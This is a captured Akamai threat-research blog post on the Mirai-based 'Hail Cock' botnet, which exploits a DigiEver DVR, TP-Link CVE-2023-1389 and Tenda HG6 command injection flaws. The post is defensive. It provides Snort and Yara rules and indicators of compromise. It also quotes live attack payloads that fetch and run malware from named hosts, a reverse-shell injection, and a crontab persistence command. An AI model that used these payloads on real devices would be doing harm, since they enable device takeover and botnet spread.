www.akamai.com
Open in
urlscan Pro
2a02:26f0:480:36::212:4020
Public Scan
URL:
https://www.akamai.com/blog/security-research/2024/dec/digiever-fix-that-iot-thing
Submission Tags: @nominet_threat_intel feedly-filtered-v1.0 reference_article_link confidence_null cluster_67692498 Search All
Submission: On December 21 via api from GB — Scanned from GB
Submission Tags: @nominet_threat_intel feedly-filtered-v1.0 reference_article_link confidence_null cluster_67692498 Search All
Submission: On December 21 via api from GB — Scanned from GB
Form analysis 0 forms found in the DOM
Text Content
Twitter LinkedIn Email
Close
X
Skip to main content
Need cloud computing? Get started now
Close Button
+44-1784225531
+44-1784225531
Login
Control Center
Access the Akamai platform
Cloud Manager
Manage your cloud resources
en
* English
* Deutsch
* Español
* Français
* Italiano
* Português
* 中文
* 日本語
* 한국어
Try Akamai
Under Attack?
Back
1. Products
2. Solutions
3. Why Akamai
4. Resources
5. Partners
6. Contact Us
+44-1784225531
Back
PRODUCTS
Back
1. Cloud Computing
2. Security
3. Content Delivery
4. All Products and Trials
5. Global Services
+44-1784225531
Back
CLOUD COMPUTING
CLOUD COMPUTING
Learn more
Create a Cloud Account
Compute
Build, release, and scale faster with VMs for every workload
See all
Networking
Secure your network, balance traffic, control your infrastructure
See all
Containers
Efficiently orchestrate containerized applications
See all
Developer Tools
Get the most out of your applications with advanced management tools
See all
Storage
Deploy dependable, easily accessible storage and management
See all
Databases
Scale easily with simple and reliable managed databases
See all
Create a Cloud Account
SECURITY
SECURITY
Learn more
APP AND API SECURITY
API Security
Discover and monitor API behavior to respond to threats and abuse
App & API Protector
Protect web apps and APIs from DDoS, bots, and OWASP Top 10 exploits
Client-Side Protection & Compliance
Assist with PCI compliance and protect against client-side attacks
ZERO TRUST SECURITY
Akamai Guardicore Platform
One Zero Trust platform for coverage, visibility, and granular control.
Akamai Guardicore Segmentation
Mitigate risk in your network with granular, flexible segmentation
Secure Internet Access
Proactively protect against zero-day malware and phishing
Hunt
Stop the most evasive threats with proactive threat hunting
Enterprise Application Access
Granular application access based on identity and context
Akamai MFA
Harden against account takeovers and data breaches with phish-proof MFA
BOT & ABUSE PROTECTION
Account Protector
Mitigate account abuse and grow your digital business
Content Protector
Stop scrapers, protect intellectual property, and increase conversion
Brand Protector
Detect and mitigate fraudulent representations of your brand
Bot Manager
Welcome the bots you want and mitigate those you don’t
Identity Cloud
Add secure, cloud-based identity management to your websites or apps
INFRASTRUCTURE SECURITY
Edge DNS
External authoritative solution for your DNS infrastructure
Prolexic
Protect your infrastructure from distributed denial-of-service attacks
IP Accelerator
Boost network performance and security for IP-based applications
CONTENT DELIVERY
CONTENT DELIVERY
Learn more
APPLICATION PERFORMANCE
Ion
Improve the performance and reliability of your website at scale
API Acceleration
Improve the performance and reliability of your APIs at scale
IP Accelerator
Boost network performance and security for IP-based applications
MEDIA DELIVERY
Adaptive Media Delivery
High-quality video delivery for any screen to global audiences
Download Delivery
Deliver large file downloads flawlessly, every time, at global scale
EDGE APPLICATIONS
EdgeWorkers
Execute custom JavaScript at the edge, near users, to optimize UX
EdgeKV
Distributed key-value store database at the edge
Image & Video Manager
Automatically optimize images and video for every user, on any device
Cloudlets
Predefined apps that run at the edge for specific business needs
Cloud Wrapper
Use an efficient caching layer to improve origin offload
Global Traffic Management
Optimize performance with intelligent load balancing
MONITORING, REPORTING, AND TESTING
DataStream
Low-latency data feed for visibility and ingest into third-party tools
mPulse
Measure the business impact of real user experiences in real time
CloudTest
Site and application load testing at global scale
SOLUTIONS
Back
1. Use Cases
2. Industry Solutions
+44-1784225531
Back
USE CASES
CLOUD COMPUTING
Media
Deliver an engaging, interactive video experience
SaaS
Build with portability, performance, and efficiency from cloud to client
Gaming
Improve the gamer experience with low latency and high availability
SECURITY
Apps and APIs
Protect your brand by securing apps and APIs from persistent threats
Zero Trust
Solutions for comprehensive coverage, visibility and control
DDoS Protection
Protect your infrastructure from DDoS and DNS attacks
Bot & Abuse Protection
Stop account abuse, sophisticated bot attacks, and brand impersonation
CONTENT DELIVERY
App and API Performance
Improve user engagement through app & API optimization
Media Delivery
Deliver seamless streaming and download experiences to any device
Edge Compute
Build and deploy on the world’s most distributed edge platform
INDUSTRY SOLUTIONS
Media and Entertainment
Retail, Travel, and Hospitality
Financial Services
Healthcare and Life Sciences
Public Sector
Games
iGaming and Sports Betting
Publishing
Service Providers
WHY AKAMAI
Why Akamai
Discover Akamai Connected Cloud
Learn more
Our Platform
Explore our global infrastructure
Learn more
Company
See how we power and protect life online
Learn more
RESOURCES
Back
1. Library
2. Learn
3. Security Research
4. TechDocs
5. Developer Resources
6. Blog
7. Events
+44-1784225531
Back
LIBRARY
LIBRARY
See all
Product Briefs
Reference Architectures
Customer Stories
Ebooks
White Papers
Webinars
Videos
LEARN
Learning Hub
Educational resources and training for Akamai products and services
Glossary
Key concepts in security, cloud computing, and content delivery
SECURITY RESEARCH
Akamai Security Research
Insights and intelligence from the Akamai Security Intelligence Group
State of the Internet (SOTI) Reports
In-depth analysis of the latest cybersecurity research and trends
PARTNERS
Back
1. Find a Partner
2. Become a Partner
3. Cloud Computing Marketplace
+44-1784225531
Back
FIND A PARTNER
Why Choose an Akamai Partner
Learn about our industry-leading ecosystem of partners
Partner Directory
Find a channel or technology partner
BECOME A PARTNER
Channel Partners
Unlock more profit, focus on what matters, and deliver with confidence
Technology Partners
Create more value for joint customers with seamless integrations
CONTACT US
Contact Sales
Have questions? We can help.
Contact us
Customer Support
Need technical support? We are here 24/7.
Get support
Login
Control Center
Access the Akamai platform
Cloud Manager
Manage your cloud resources
en
* English
* Deutsch
* Español
* Français
* Italiano
* Português
* 中文
* 日本語
* 한국어
1. Blog
2. Security Research
3. DigiEver Fix That IoT Thing!
DIGIEVER FIX THAT IOT THING!
Written by
Kyle Lefton, Daniel Messing, and Larry Cashdollar
December 19, 2024
Written by
Kyle Lefton
Kyle Lefton is a security researcher on Akamai's Security Intelligence Response
Team. Formerly an intelligence analyst for the Department of Defense, Kyle has
experience in cyber defense, threat research, and counter-intelligence, spanning
several years. He takes pride in investigating emerging threats, vulnerability
research, and threat group mapping. In his free time, he enjoys spending time
with friends and family, strategy games, and hiking in the great outdoors.
Written by
Daniel Messing
Daniel Messing is a seasoned threat intelligence specialist with more than a
decade of experience across public and private sectors. As a Senior Security
Researcher on the Security Intelligence Response Team, he has been instrumental
in building, enhancing, and scaling global threat intelligence programs both at
Akamai and in other organizations. Outside of work, Daniel enjoys reading and
playing sports.
Written by
Larry Cashdollar
Larry Cashdollar has been working in the security field as a vulnerability
researcher for more than 20 years and is currently a Principal Security
Researcher on the Security Intelligence Response Team at Akamai. He studied
computer science at the University of Southern Maine. Larry has documented more
than 300 CVEs and has presented his research at BotConf, BSidesBoston, OWASP
Rhode Island, and DEF CON. He enjoys the outdoors and rebuilding small engines
in his spare time.
Share
The malware samples we identified were Mirai-based malware variants that were
distributed in a variety of architectures.
EXECUTIVE SUMMARY
* A vulnerability in DigiEver DS-2105 Pro DVRs is being exploited to spread
malware.
* The Akamai Security Intelligence Research Team (SIRT) noticed this activity
in their honeypots on November 18, 2024.
* The vulnerability was originally discovered by Ta-Lun Yen and a CVE
identifier has been requested by the Akamai SIRT.
* The malware is a Mirai variant that has been modified to use improved
encryption algorithms.
* We have included a list of indicators of compromise (IoCs) in this blog post
to assist in defense against this threat.
Jump to the IoCs
CONTENT WARNING: The threat actors responsible for this malware use content
naming that may be considered offensive by some. We did not redact them in an
effort to increase detection as this campaign is currently active in the wild.
INTRODUCTION AND DISCOVERY
In mid-November 2024, the Akamai SIRT discovered an uptick in activity targeting
the URI /cgi-bin/cgi_main.cgi in our global network of honeypots. This activity
appears to be part of a recent ongoing Mirai-based malware campaign dating back
to at least October 2024.
The vulnerability does not have a CVE assignment at this time, but it appears to
have originally been discovered and published by Ta-Lun Yen from TXOne Research.
In this publication, he attributed this remote code execution (RCE)
vulnerability to multiple DVR devices, including the DigiEver DS-2105 Pro model.
Our analysts determined the exploit attempts we observed were in line with this
published vulnerability research.
Further investigation into this campaign revealed a new botnet that calls itself
the “Hail Cock Botnet” that’s been active since at least September 2024. Using a
Mirai malware variant that incorporates ChaCha20 and XOR decryption algorithms,
it has been seen compromising vulnerable Internet of Things (IoT) devices in the
wild, such as the DigiEver DVR, and TP-Link devices through CVE-2023-1389.
THE VULNERABILITY
The DigiEver DVR vulnerability was discovered by the TXOne researcher after
looking into some exposed IP address ranges during penetration testing. Through
Shodan's queries, he was able to identify many of the IP addresses as
historically vulnerable devices, such as DVRs. He was able to emulate the
DigiEver DVR firmware and noticed that /cgi-bin/cgi_main.cgi was one of the CGI
endpoints (Figure 1).
Fig. 1: Endpoint with suspected vulnerability
Through this endpoint, the researcher was able to achieve RCE (Figure 2).
Fig. 2: RCE confirmed by researcher
ACTIVE EXPLOITATION
The Akamai SIRT noticed that this URI started to be targeted by an unknown
threat actor on November 18, 2024. We were able to match the syntax of the
payload we observed in our honeypots to the proof of concept (PoC) from the
research publication (Figure 3).
cgiName=time_tzsetup.cgi&page=/cfg_system_time.htm&id=69&ntp=`rm x86;curl --output x86 http://154.216.17[.]126/x86; chmod 777 *; ./x86 nvr`&ntp1=time.stdtime.gov.tw&ntp2=`rm x86;curl --output x86 http://154.216.17[.]126/x86; chmod 777 *; ./x86 nvr`&isEnabled=0&timeDiff=+9&ntpAutoSync=1&ntpSyncMode=1&day=0&hour=0&min=0&syncDiff=30
Copy
Fig. 3: Payload targeting DigiEver RCE vulnerability (URL decoded)
The vulnerability appears to allow for command injection as an argument into the
ntp parameter. In this example, it is reaching out to a remote malware-hosting
server to download Mirai-based malware. These sessions come in as HTTP POST
requests over port 80, with “**IP Address**:80/cfg_system_time.htm” as the HTTP
Referer header.
In addition to the DigiEver RCE exploit, we also see this botnet targeting other
vulnerabilities, such as CVE-2023-1389, affecting TP-Link devices (Figure 4).
GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id>`wget+http://45.202.35[.]24/l+-O-|+sh`) HTTP/1.1
Host: localhost:80
User-Agent: Go-http-client/1.1
Copy
Fig. 4: Payload targeting CVE-2023-1389
The botnet exploits this command injection vulnerability in the
/cgi-bin/luci;stok=/locale endpoint on the TP-Link web management interface to
download and execute a malicious shell script. This script in turn downloads the
Mirai malware payload and executes it on the target system (Figure 5).
Fig. 5: Contents of the downloaded “l” script from the request above for
CVE-2023-1389 (Source: https://ducklingstudio.blog.fc2.com/blog-entry-394.html)
The botnet also targets the Tenda HG6 v3.3.0 remote command injection
vulnerability (Figure 6).
/boaform/admin/formTracert target_addr=;`rm+/tmp/f%3bmknod+/tmp/f+p%3bcat+/tmp/f|/bin/sh+-i+2>%261|wget+http://45.202.35[.]24/b+-O-|+sh+>/tmp/f`&waninf=1_INTERNET_R_VID_
Copy
Fig. 6: Payload targeting Tenda HG6
In addition to these vulnerabilities, we observed this botnet targeting others,
such as CVE-2018-17532, affecting Teltonika RUT9XX routers. The exploit
downloads and executes a shell script via a wget request, which, in turn, makes
an additional request to download and execute the malware on the target machine
(Figure 7).
Fig. 7: Contents of the “b.sh” shell script
THE MALWARE
The malware samples we identified were Mirai-based malware variants that were
distributed in a variety of architectures, including x86, ARM, MIPS, and more.
One aspect that was particularly interesting about these samples was their use
of both XOR and ChaCha20 for their decryption algorithm.
Some of the strings that are seen in the dynamic analysis section, such as the
output to console of “you are now apart of hail cock botnet” could not be seen
in the human-readable strings section of the malware, nor in the XOR decoded
strings.
We found that an independent security researcher in Japan published some
interesting findings about this malware. He discovered that the malware was
decrypting this string and displaying it on the console, with the string stored
in the binary's data segment (Figure 8).
Fig. 8: Decrypting message
Checking where a string is assigned to that output shows the string decryption
function (FUN_00408500) and the string location ( DAT_005166a0) as an argument.
After initializing, the next function is used to process the encrypted string
from the second argument and store it in memory (Figure 9).
Fig. 9: Decrypting data sections
When examining the function "FUN_00404960," the researcher discovered that its
final step involves an XOR operation. In sections where constants are utilized
and converted to ASCII code, the function returns the string "expand 32-byte k."
This string is a known constant in cryptographic algorithms like Salsa20 and
ChaCha20, indicating that the function labeled "FUN_00404960" is responsible for
decryption (Figure 10).
Fig. 10: Decrypting with Salsa20 and ChaCha20
Although employing complex decryption methods isn't new, it suggests evolving
tactics, techniques, and procedures among Mirai-based botnet operators. This is
mostly notable because many Mirai-based botnets still depend on the original
string obfuscation logic from recycled code that was included in the original
Mirai malware source code release.
From static string analysis, the malware uses many default or common credentials
to various devices to spread the botnet to additional hosts. Many new credential
pairs have been added to the original ones that shipped with Mirai — including
the string “telecomadmin”, for example, which is the default username for the
Huawei ONT HG8245H5 fiber termination kit, and the default password for some
routers using the Realtek chipset.
SANDBOX DETAILS
By running the malware samples in dynamic sandbox environments, we were able to
identify additional IoCs and notable strings from the malware. One such behavior
we saw was the creation of a cron job to download and run a shell script from
the domain “hailcocks[.]ru” to maintain persistence (Figure 11). It will attempt
to download the “wget.sh” file from the same server using curl and/or wget to
ensure compatibility in case one of them is not installed on the compromised
host.
sh -c "(crontab -l ; echo \"@reboot cd /tmp; wget http://hailcocks[.]ru/wget.sh; curl --output wget.sh http://hailcocks[.]ru/wget.sh; chmod 777 wget.sh; ./wget.sh\") | crontab -"
Copy
Fig. 11: Persistence via crontab
Upon execution, the malware connected to a larger variety of hosts, consistent
with typical Mirai Telnet and SSH brute-forcing behavior. It also connects to a
separate single IP address with resolving A records to the domain
“kingstonwikkerink[.]dyn” for command and control (C2) communication.
Additionally, hosts that are compromised with this malware will see a unique
string printed to the console upon malware execution. Older versions of the
malware will print the string “you are now apart of hail cock botnet” (Figure
12). Newer versions of the malware will print the string “I just wanna look
after my cats, man.” to the console instead (Figure 13).
Fig. 12: Older malware console output message
Fig. 13: Newer malware console output message
CONCLUSION
Cybercriminals have consistently leveraged the legacy of the Mirai malware to
perpetuate botnet campaigns for years, and the new Hail Cock botnet is no
exception. One of the easiest methods for threat actors to compromise new hosts
is to target outdated firmware or retired hardware. The DigiEver DS-2105 Pro,
which is approximately 10 years old now, is an example. Hardware manufacturers
do not always issue patches for retired devices, and the manufacturer itself may
sometimes be defunct. Therefore, in circumstances in which security patches are
unavailable and unlikely to come, we recommend upgrading vulnerable devices to a
newer model.
IOCS
We’ve included a list of IoCs, as well as Snort and Yara rules, to aid
defenders.
SNORT RULES FOR NETWORK IOCS
SNORT RULES FOR C2 IPS
alert tcp $HOME_NET any -> 154.216.17.126 any (msg:"C2 Comms for Hail Cock Botnet to 154.216.17.126"; flow:to_server,established;)
alert tcp $HOME_NET any -> 154.213.187.50 any (msg:"C2 Comms for Hail Cock Botnet to 154.213.187.50"; flow:to_server,established;)
alert tcp $HOME_NET any -> 86.107.100.80 any (msg:"C2 Comms for Hail Cock Botnet to 86.107.100.80"; flow:to_server,established;)
alert tcp $HOME_NET any -> 213.182.204.57 any (msg:"C2 Comms for Hail Cock Botnet to 213.182.204.57"; flow:to_server,established;)
alert tcp $HOME_NET any -> 195.133.92.51 any (msg:"C2 Comms for Hail Cock Botnet to 195.133.92.51"; flow:to_server,established;)
alert tcp $HOME_NET any -> 185.82.200.181 any (msg:"C2 Comms for Hail Cock Botnet to 185.82.200.181"; flow:to_server,established;)
alert tcp $HOME_NET any -> 81.29.149.178 any (msg:"C2 Comms for Hail Cock Botnet to 81.29.149.178"; flow:to_server,established;)
alert tcp $HOME_NET any -> 88.151.195.22 any (msg:"C2 Comms for Hail Cock Botnet to 88.151.195.22"; flow:to_server,established;)
alert tcp $HOME_NET any -> 91.149.218.232 any (msg:"C2 Comms for Hail Cock Botnet to 91.149.218.232"; flow:to_server,established;)
alert tcp $HOME_NET any -> 91.149.238.18 any (msg:"C2 Comms for Hail Cock Botnet to 91.149.238.18"; flow:to_server,established;)
alert tcp $HOME_NET any -> 31.13.248.89 any (msg:"C2 Comms for Hail Cock Botnet to 31.13.248.89"; flow:to_server,established;)
alert tcp $HOME_NET any -> 193.233.193.45 any (msg:"C2 Comms for Hail Cock Botnet to 193.233.193.45"; flow:to_server,established;)
alert tcp $HOME_NET any -> 194.87.198.29 any (msg:"C2 Comms for Hail Cock Botnet to 194.87.198.29"; flow:to_server,established;)
alert tcp $HOME_NET any -> 45.202.35.91 any (msg:"C2 Comms for Hail Cock Botnet to 45.202.35.91"; flow:to_server,established;)
alert tcp $HOME_NET any -> 104.37.188.76 any (msg:"C2 Comms for Hail Cock Botnet to 104.37.188.76"; flow:to_server,established;)
alert tcp $HOME_NET any -> 95.214.53.205 any (msg:"C2 Comms for Hail Cock Botnet to 95.214.53.205"; flow:to_server,established;)
alert tcp $HOME_NET any -> 5.35.104.31 any (msg:"C2 Comms for Hail Cock Botnet to 5.35.104.31"; flow:to_server,established;)
alert tcp $HOME_NET any -> 149.50.106.25 any (msg:"C2 Comms for Hail Cock Botnet to 149.50.106.25"; flow:to_server,established;)
alert tcp $HOME_NET any -> 141.98.11.79 any (msg:"C2 Comms for Hail Cock Botnet to 141.98.11.79"; flow:to_server,established;)
alert tcp $HOME_NET any -> 45.202.35.24 any (msg:"C2 Comms for Hail Cock Botnet to 45.202.35.24"; flow:to_server,established;)
alert tcp $HOME_NET any -> 5.39.254.71 any (msg:"C2 Comms for Hail Cock Botnet to 5.39.254.71"; flow:to_server,established;)
alert tcp $HOME_NET any -> 45.126.50.101 any (msg:"C2 Comms for Hail Cock Botnet to 45.126.50.101"; flow:to_server,established;)
Copy
SNORT RULES FOR C2 DOMAIN RESOLUTION DETECTION
alert tcp $HOME_NET any -> hailcocks.ru any (msg:"BLOCK Connection to malicious domain - hailcocks.ru"; flow:to_server,established; sid:1000010; rev:1;)
alert tcp $HOME_NET any -> kingstonwikkerink.dyn any (msg:"BLOCK Connection to malicious domain - kingstonwikkerink.dyn"; flow:to_server,established; sid:1000011; rev:1;)
alert tcp $HOME_NET any -> catvision.dyn any (msg:"BLOCK Connection to malicious domain - catvision.dyn"; flow:to_server,established; sid:1000012; rev:1;)
alert tcp $HOME_NET any -> hikvision.geek any (msg:"BLOCK Connection to malicious domain - hikvision.geek"; flow:to_server,established; sid:1000013; rev:1;)
alert tcp $HOME_NET any -> shitrocket.dyn any (msg:"BLOCK Connection to malicious domain - shitrocket.dyn"; flow:to_server,established; sid:1000014; rev:1;)
alert tcp $HOME_NET any -> catlovingfools.geek any (msg:"BLOCK Connection to malicious domain - catlovingfools.geek"; flow:to_server,established; sid:1000015; rev:1;)
Copy
YARA RULES FOR MALWARE SAMPLES
rule hailcock_malware
{
strings:
$someoffdeeznuts = "someoffdeeznuts"
$ip_address = { 154.213.187.50 }
condition:
any of them
}
rule malware_hashes
{
strings:
$hash_1 = "3c0eb5de2946c558159a6b6a656d463febee037c17a1f605330e601cfcd39615"
$hash_2 = "0d8c3289a2b21abb0d414e2c730d46081e9334a97b5e0b52b9a2f248c59a59ad"
$hash_3 = "b32390e3ed03b99419c736b2eb707886b9966f731e629f23e3af63ea7a91a7af"
$hash_4 = "dec561cc19458ea127dc1f548fcd0aaa51db007fa8b95c353086cd2d26bfcf02"
$hash_5 = "a1b73a3fbd2e373a35d3745d563186b06857f594fa5379f6f7401d09476a0c41"
condition:
any of them
}
rule malicious_domains
{
strings:
$hailcocks = "hailcocks.ru"
$kingstonwikkerink = "kingstonwikkerink.dyn"
$catvision = "catvision.dyn"
$catloving = "catlovingfools.geek"
$hikvision = "hikvision.dyn"
$shitrocket = "shitrocket.dyn"
condition:
any of them
}
Copy
IPV4 ADDRESSES OF HISTORICAL INFRASTRUCTURE
154.216.17.126
154.213.187.50
86.107.100.80
213.182.204.57
195.133.92.51
185.82.200.181
81.29.149.178
88.151.195.22
91.149.218.232
91.149.238.18
31.13.248.89
193.233.193.45
194.87.198.29
45.202.35.91
104.37.188.76
95.214.53.205
5.35.104.31
149.50.106.25
141.98.11.79
45.202.35.24
5.39.254.71
45.125.66.90
91.132.50.181
DOMAINS FOR C2 AND MALWARE DISTRIBUTION ENDPOINTS
hailcocks[.]ru
kingstonwikkerink[.]dyn
catvision[.]dyn
shitrocket[.]dyn
catlovingfools[.]geek
hikvision[.]geek
SHA256 HASHES
3c0eb5de2946c558159a6b6a656d463febee037c17a1f605330e601cfcd39615
0d8c3289a2b21abb0d414e2c730d46081e9334a97b5e0b52b9a2f248c59a59ad
b32390e3ed03b99419c736b2eb707886b9966f731e629f23e3af63ea7a91a7af
dec561cc19458ea127dc1f548fcd0aaa51db007fa8b95c353086cd2d26bfcf02
a1b73a3fbd2e373a35d3745d563186b06857f594fa5379f6f7401d09476a0c41
31813bb69e10b636c785358ca09d7f91979454dc6fc001f750bf03ad8bde8fe5
See more research
--------------------------------------------------------------------------------
* Cyber Security
* Information Security
* Threat Intelligence
* Security Research
Share
--------------------------------------------------------------------------------
Written by
Kyle Lefton, Daniel Messing, and Larry Cashdollar
December 19, 2024
Written by
Kyle Lefton
Kyle Lefton is a security researcher on Akamai's Security Intelligence Response
Team. Formerly an intelligence analyst for the Department of Defense, Kyle has
experience in cyber defense, threat research, and counter-intelligence, spanning
several years. He takes pride in investigating emerging threats, vulnerability
research, and threat group mapping. In his free time, he enjoys spending time
with friends and family, strategy games, and hiking in the great outdoors.
Written by
Daniel Messing
Daniel Messing is a seasoned threat intelligence specialist with more than a
decade of experience across public and private sectors. As a Senior Security
Researcher on the Security Intelligence Response Team, he has been instrumental
in building, enhancing, and scaling global threat intelligence programs both at
Akamai and in other organizations. Outside of work, Daniel enjoys reading and
playing sports.
Written by
Larry Cashdollar
Larry Cashdollar has been working in the security field as a vulnerability
researcher for more than 20 years and is currently a Principal Security
Researcher on the Security Intelligence Response Team at Akamai. He studied
computer science at the University of Southern Maine. Larry has documented more
than 300 CVEs and has presented his research at BotConf, BSidesBoston, OWASP
Rhode Island, and DEF CON. He enjoys the outdoors and rebuilding small engines
in his spare time.
RELATED BLOG POSTS
This month, there are 71 total CVEs across 32 different components. Of those
CVEs, 17 are critical and one was seen in the wild.
AKAMAI’S PERSPECTIVE ON DECEMBER’S PATCH TUESDAY 2024
December 13, 2024
Hope you left some room after Thanksgiving — we’re stuffing CVEs while waiting
for our stockings. This month, we’ve got 71 total CVEs; one seen in the wild.
by Akamai Security Intelligence Group
Read more
This analysis is an unfortunate example of how technology created for good can
be hijacked for malicious purposes.
TEACHING AN OLD FRAMEWORK NEW TRICKS: THE DANGERS OF WINDOWS UI AUTOMATION
December 11, 2024
Microsoft’s UI Automation framework has some great features, but in the wrong
hands, it can lead to bad outcomes — and even evade your EDR.
by Tomer Peled
Read more
Customers are advised to enable these capabilities and mitigate the risks
highlighted by the research.
WHAT YOU SHOULD KNOW ABOUT BREAKINGWAF
December 10, 2024
BreakingWAF is not a vulnerability stemming from WAF solutions — it is a
misconfiguration vulnerability that can be addressed during customer onboarding.
by Akamai Security Research
Read more
Rate the helpfulness of this page
PRODUCTS
* Cloud Computing
* Security
* Content Delivery
* All products and trials
* Global Services
COMPANY
* About Us
* History
* Leadership
* Facts and Figures
* Awards
* Board of Directors
* Investor Relations
* Environmental, Social, and Governance
* Ethics
* Locations
* Vulnerability Reporting
CAREERS
* Careers
* Working at Akamai
*
* Students and Recent Grads
* Workplace Diversity
* Search Jobs
* Culture Blog
NEWSROOM
* Newsroom
* Press Releases
* In the News
* Media Resources
LEGAL & COMPLIANCE
* Legal
* Information Security Compliance
* Privacy Trust Center
* Cookie Settings
* EU Digital Services Act (DSA)
GLOSSARY
* What Is API Security?
* What Is a CDN?
* What Is Cloud Computing?
* What Is Cybersecurity?
* What Is a DDoS attack?
* What Is Microsegmentation?
* What Is WAAP?
* What Is Zero Trust?
* See all
Twitter Facebook Youtube Linkedin
* EMEA Legal Notice
* Service Status
* Contact Us
--------------------------------------------------------------------------------
* EMEA Legal Notice
* Service Status
* Contact Us
* en
* English
* Deutsch
* Español
* Français
* Italiano
* Português
* 中文
* 日本語
* 한국어
©2024 Akamai Technologies
YOUR COOKIE CHOICES FOR THIS WEBSITE
We use cookies to ensure the fast reliable and secure operation of this website,
to improve your website experience, to enable certain social media interactions
and to manage your cookie choices. Some cookies process personal data. By
agreeing to the placement of the cookies you also agree to the related personal
data processing activities, where applicable. Click “Manage Preferences” to make
individual choices and get details on the cookies in use and the processing
activities in the Cookie Details section, click “Accept Cookies” to agree to the
storing of all cookies except for strictly necessary cookies and the data
processing activities or click “Reject Cookies” to reject all cookies except for
strictly necessary cookies. You can withdraw your consent at any time by
clicking on the Cookie Icon that appears at the lower left corner when scrolling
the website. For additional information relating to your privacy take a look at
ourPrivacy Statement.
Reject Cookies
Accept CookiesManage Preferences